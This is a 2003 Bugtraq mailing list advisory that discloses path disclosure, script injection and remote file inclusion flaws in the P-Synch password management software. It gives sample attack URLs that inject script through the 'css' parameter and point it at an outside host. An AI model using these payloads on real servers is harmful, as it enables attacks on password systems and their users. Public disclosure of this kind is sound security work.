Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Multiple Vulnerabilities In P-Synch Password Management

From: JeiAr <jeiar () kmfms com>
Date: 29 May 2003 05:26:21 -0000


Multiple Vulnerabilities In P-Synch Password Management
-------------------------------------------------------
The other night I came across a server running P-Synch. 
I had never heard of it so i was curious to poke around 
on it a bit. Within an hour i found the vulns listed below. 
Im pretty sure there are other more serious vulns in 
P-Synch, but they are very picky about who they give thier
software to, even an evaluation version. So was not able
to test any further. However i encourage any admins running
P-Synch to poke around on it, just to be on the safe side.



Description
-------------------------------------------------------
P-Synch Total Password Management Solution  
by M-TECH
P-Synch is a total password management solution. It is 
intended to reduce the cost of ownership of password systems, 
and simultaneously improve the security of password protected 
systems. This is done through: -Password Synchronization. 
-Enforcing an enterprise wide password strength policy. 
-Allowing authenticated users to reset their own forgotten 
passwords and enable their locked out accounts. -Streamlining 
help desk call resolution for password resets. P-Synch is 
available for both internal use, on the corporate Intranet, 
as well as for the Internet deployment in B2B and B2C 
applications.

http://www.securityfocus.com/products/837



Problems
-------------------------------------------------------
All of these problems are simple, self explanatory vulns
so, i'm sure the below examples will speak for themselves.
Once again this application was NOT thoroughly researced.
So anyone with a copy of P-Synch might wanna explore it
further.



Path Disclosure Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=


Code Injection Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psf.exe?css=";>[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=";>[VBScript, JScript etc]


File Include Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file



Credits
-------------------------------------------------------
All credits go to JeiAr of GulfTech Computers and CSA 
Security Research http://www.gulftech.org
Previous By Date Next
Previous By Thread Next

Current thread: